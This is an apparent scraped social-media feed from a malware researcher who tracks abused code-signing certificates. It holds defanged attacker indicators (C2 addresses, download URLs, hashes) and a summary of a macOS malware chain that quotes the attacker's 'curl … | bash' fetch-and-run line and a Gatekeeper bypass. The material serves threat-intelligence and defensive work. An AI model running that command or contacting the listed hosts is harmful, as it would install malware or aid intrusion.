@SquiblydooBlogi
iAccount based inUnited States
About this account
- Account based in
- United States
- Connected via
- Web
Account-level information from X, not a live location or the device used for a specific post.
Creator of Debloat and https://nitter.cf/t.co/tIYqmw6pxt Support: https://nitter.cf/t.co/l9kCPRoD2y Join the Debloat/CertGraveyard discord: https://nitter.cf/t.co/ZcWIqa6ZA9
The Cert Graveyard
Joined November 2020
- Tweets2.1K
- Following100
- Followers4.9K
- Likes12.6K
Pinned Tweet
Why, hello there, #solarmarker.
virustotal.com/gui/file/1e79…
My GitHub got locked down. Hoping to get it back up soon. 🥲
While it is down, I assume CertGraveyard will be inaccessible via web, only accessible via API.
I think their automation got angry about a malware analysis report and nuked my account because of it.
Same file flagged by @malwrhunterteam
File has EV code-signing signature "Xidao E-commerce Studio, Yishui County"
b4e4250fdfb3a7398edc10be74a79e29100460d6a2d0bef99e4f5411a2dbe68a
Amazing analysis by @devmihaylov
A signed loader that installs a real IT agent answering to the attacker.
134[.]122[.]200[.]153:8151 - C2
hxxps://gfgxcx[.]com/LocalOffice1[.]zip - second stage
178[.]128[.]118[.]22 - download host
medium.com/@devmihaylov/a-si…
Squiblydoo retweeted
A Certum EV-signed stager that pulls shellcode from a customer-service CDN
cik07-cos[.]7moor-fs2[.]com/im/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/ - stage 2
37E0CA1FFE95DDF08D4979EFEB4AF05668B89BEF - Certum EV cert (live, revocation requested)
medium.com/@devmihaylov/a-ce…
During a fake IT vish targeting Germany, the attackers drop a signed file, currently one signed by "YOUR CHANCE j.d.o.o".
The tool pulls the user's name and validates their credentials when entered. Credentials are saved for the attackers.
See github.security.telekom.com/… for more details.
We observed this actor first in 2024 and have tracked them as "RUS-2" and "RUS-51" (for lack of better names), the record is in CertGraveyard: certgraveyard.org/documentat… .
(Note, if you are interested in helping cluster and make sense of the ~2,500 certificates we've reported over the years, we're happy for help. 🥲Join the discord: discord.gg/dvGXKaY5qr)
VirusTotal: virustotal.com/gui/file/88fc…
MalwareBazaar: bazaar.abuse.ch/sample/88fce…
The code-signing certificate for "OpsBridge LLC" is revoked.
We continue to see new brands of RMM tools pop up and drop ScreenConnect immediately.
We (CertGraveyard) didn't report the cert, but other's aren't putting up with this either.
Others reported that OpsBridge was all kinds of suspicious: registered with throw-away email accounts, sold via Telegram, etc.
virustotal.com/gui/file/7c6a…
Thanks for those reviewing, writing, tweeting, about this type of stuff. @ExpectedErr0r @0xBurgers @devmihaylov. Your work is seen and appreciated.
OpsBridge - EV-signed MSI, RMM implant, silent ScreenConnect deploy.
flavourworld[.]es/invite/
opsbridge[.]digital
pub-45afe949f9564e33acd276c93be952c8[.]r2[.]dev
relay[.]tolreanrust[.]site:8041
server[.]tolreanrust[.]site
medium.com/@devmihaylov/an-o…
The difference between the statement of "programming is solved" and the reality is so weird.
I spent hours today maintaining an open source library that gets 230k/mo downloads. The library adds drag-and-drop functionality to Python's Tkinter. That is, it is a library that hundreds of thousands of people rely upon to build the apps that they imagine.
But they can only build what they imagine because these libraries exist. Because individuals are still maintaining them. Still hunting bugs.
The library I maintain, tkinterdnd2, has been abandoned multiple times in its life. But it is one of the core libraries that LLMs will recommend. This is driving its surge in use.
I've been helping it survive major changes that hardly anyone batted an eye at:
- the removal of Tix from Python
- the switch from Tcl 8 to Tcl 9
- The need to run on ARM systems
Could the 230k/m used other libraries like PyQT6? Sure. But it is the same story for PyQT6 and every other library that is still maintained out of love. These libraries make the most ordinary things possible, but their existence and maintenance isn't a solved problem
New entry: "Alsace Music ApS" in Cert Graveyard
Certificate was used to sign a trojanized installer; dropped during Microsoft Teams Vishing. I'm sure it is benign though, right?
virustotal.com/gui/file/38f3…
"Shenzhen Xinfeng E-commerce Co., Ltd." shouldn't be signing other people's software.
---
Microsoft fully implemented changes to EV certificates this year: EV certificates no longer give instant trust. As a result, actors who wish to use EV they purchase need to "warm" the cert by getting installs to increase the certificate's reputation.
We're seeing this much more frequently.
This seems to be a copy of StreamYard which is re-signed:
virustotal.com/gui/file/3c90…
We've confidently added it to the Cert Graveyard.
The talks for the upcoming BSidesNYC will be amazing.
There were a ton of great submissions and I was honored with being able to contribute as part of the CFP Panel.
Replying to @BSidesNYC
@BSidesNYC thanks @gleeda and the rest of the 0x06 Tech CFP Panel, @cyb3rkitties, Andrew Schwartz, @hrbrmstr, @ImposeCost, David Cowen, Devon Kerr, Harlan Carvey, Spike, Melissa Bischoping, @rmettig_, @rootsecdev, and @SquiblydooBlog for volunteering their to curate our con.
Squiblydoo retweeted
No, #Trickbot is NOT back. What Fortinet forgot to mention is that the samples they analyzed are known Anchor DNS from 2020. I'm not even kidding.
Better read from back then: netscout.com/blog/asert/drop…
🚨 TrickBot is back with a stealthier command and control method.
The new variant replaces traditional HTTP communications with DNS tunneling, making malicious traffic harder to detect on Windows.
Listen/Read: hackread.com/new-trickbot-va…
#CyberSecurity #Malware #TrickBot #Windows
The mad lads did it. I saw it was possible that GoldenEyeDog gotten a hold of a cert for Tencent in April, but we hadn't seen it being used to sign malware.
After 3 months of it being revoked, it showed up on VirusTotal.
Added to the Cert Graveyard.
Forgot to drop the hash: 25787f5541566d193f35b220b4953a6057aabc05a54bf9b7cf903fb8fdf26912
virustotal.com/gui/file/2578…
On MalwareBazaar: bazaar.abuse.ch/sample/25787…
Regarding CVE-2026-63030, this is what I see in the Apache logs on attempts:
PHP Warning: Undefined array key 2 in .../class-wp-rest-server.php on line 1836
PHP Warning: Trying to access array offset on null in .../class-wp-rest-server.php on line 1848
Stay safe out there.
Squiblydoo retweeted
In April 2026, a Chinese cybercrime group accessed a support rep's device at DigiCert—then used that access to steal code-signing certificates meant for DigiCert customers. We're calling the actors CylindricalCanine. 🧵 1/4
AI analysis summary:
1. Velto .app (veltod, Swift, signed by "Emil Grigorov" / Team ID WWB7JA7AQV) checks for DYLD_INSERT_LIBRARIES (anti-instrumentation), then beacons to a GitHub raw-content URL (raw[.]githubusercontent[.]com/mgothiclove/pkeys/main/sys.cache) — the C2 domain was hidden as split Swift string constants, not a plain string, and had to be reconstructed from disassembly.
2. That fetches a one-liner (curl endpoint-api-v1[.]com/d/f1b24e | bash).
3. Which resolves through two layers of base64/eval obfuscation to an installer script.
4. Which downloads a second DMG, "CrashReporter.dmg", silently installs it to a hidden /tmp path, strips quarantine, ad-hoc re-signs it to bypass Gatekeeper, and launches it.
5. The final payload masquerades as Apple's crash reporter (com[.]apple.crashreporter), requests Full Disk Access + Desktop/Documents/Downloads entitlements, sets up LaunchAgent-style persistence, and has a hardcoded C2 IP (179.43.166.242) baked into its Info.plist.
Full report and components: github.com/Squiblydoo/Remnux…
Replying to @malwrhunterteam
One of the related, FUD on VT samples is a Mac sample seen with name "werkbit_installer.dmg", signed using the name "Emil Grigorov"...
🤷♂️
These Brazilian government compromised sites are easily findable if you look for Inno->NodeJS combo with *.gov.br URL
virustotal.com/gui/file/c870… - Jinan Baolian Deng Network Technology Co., Ltd.
virustotal.com/gui/file/8b3f… - TRADECONSULT AS
virustotal.com/gui/file/e0da… - Xryus Technologies LLC
"TRADECONSULT AS" signed file coming from government website hxxps://camaraparaguacu.sp.gov.br/doc/xH6jrEMlLp protected with .NET Reactor, drops NodeJS application 💯
app.any.run/tasks/65c36154-c…
virustotal.com/gui/file/8b3f…
"TRADECONSULT AS" signed file coming from government website hxxps://camaraparaguacu.sp.gov.br/doc/xH6jrEMlLp protected with .NET Reactor, drops NodeJS application 💯
app.any.run/tasks/65c36154-c…
virustotal.com/gui/file/8b3f…
Volunteers at the Cert Graveyard hunt, analyze, and report code-signing certificates on malware to thwart attacks. We don't often see what happens when it goes unmitigated, but @TheDFIRReport often does.
In this report, they report the intrusions from campaigns we had tracked.
➡️ New report out today by Jake, Dino, Ahmed Farouk, @MittenSec, @angelo_violetti, and @r3nzsec.
From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira
🔎 A user searching for ManageEngine OpManager was led to a fake download site and installed a trojanized MSI.
🐝 That install launched BumbleBee, which brought in AdaptixC2 and gave the threat actor a foothold in the network.
🔐 From there, the actor created privileged accounts, moved to domain controllers and backup servers, dumped credentials, and exfiltrated data.
💥 The intrusion ended with Akira ransomware across the root domain, followed by a return two days later to encrypt a child domain.
thedfirreport.com/2026/06/29…